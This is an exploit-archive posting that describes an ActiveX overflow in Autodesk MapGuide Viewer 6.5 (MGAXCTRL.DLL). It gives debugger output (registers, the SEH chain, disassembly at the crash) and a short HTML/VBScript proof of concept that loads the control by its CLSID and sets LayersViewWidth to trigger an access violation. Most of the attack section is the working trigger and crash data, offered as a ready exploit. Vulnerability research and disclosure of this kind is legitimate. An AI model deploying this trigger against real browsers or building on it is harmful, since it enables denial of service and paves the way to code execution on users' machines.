what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Autodesk MapGuide Viewer Overflow

Autodesk MapGuide Viewer Overflow
Posted Sep 1, 2010
Authored by d3b4g

Autodesk MapGuide Viewer version 6.5 suffers from an Active-X related overflow vulnerability in MGAXCTRL.DLL.

tags | exploit, overflow, activex
SHA-256 | b80514466ac4b3172c33af964fa09b1de9d10ee0d597300d79654121f85f1056

Autodesk MapGuide Viewer Overflow

Change Mirror Download
# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability
# Date: [01-09-2010]
# Author: [d3b4g]
# Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821
# Version: [6.5]
# Tested on: [Winxp SP3]
# regards to ROL guys





Exception Code: ACCESS_VIOLATION
Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)

Seh Chain:
--------------------------------------------------
1 192847C MGAXCTRL.DLL
2 73352542 VBSCRIPT.dll
3 7C839AD8 KERNEL32.dll



Registers:
--------------------------------------------------
EIP 0175CE9E
EAX 00000001
EBX 003EB690 -> 0193F684
ECX 00000000
EDX 003E0608 -> 00180F98
EDI 003EB5D8 -> 0193FC24
ESI 00000404
EBP 0013EA84 -> 0013EAA0
ESP 0013EA58 -> 003EB644



ArgDump:
--------------------------------------------------
EBP+8 003EB644 -> 0193F90C
EBP+12 00000000
EBP+16 0013EAD4 -> 00130000
EBP+20 0042C4F4 -> 00110024
EBP+24 0013EA94 -> 0013EAD4
EBP+28 0013EB30 -> 0013EBC0


Block Disassembly:
--------------------------------------------------
175CE8F POP ESI
175CE90 JMP [EAX+60]
175CE93 PUSH ESI
175CE94 LEA ESI,[ECX+404]
175CE9A TEST ESI,ESI
175CE9C JE SHORT 0175CEC2
175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH
175CEA2 JE SHORT 0175CEC2
175CEA4 PUSH 0
175CEA6 PUSH DWORD PTR [ESP+C]
175CEAA MOV ECX,ESI
175CEAC PUSH 0
175CEAE CALL 01912C63
175CEB3 MOV EAX,[ESI]
175CEB5 MOV ECX,ESI





PoC:


<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' />
<script language='vbscript'>

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll"
prototype = "Property Let LayersViewWidth As Long"
memberName = "LayersViewWidth"
progid = "MGMapControl.MGMap"
argCount = 1

arg1=0

target.LayersViewWidth = arg1

</script>

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close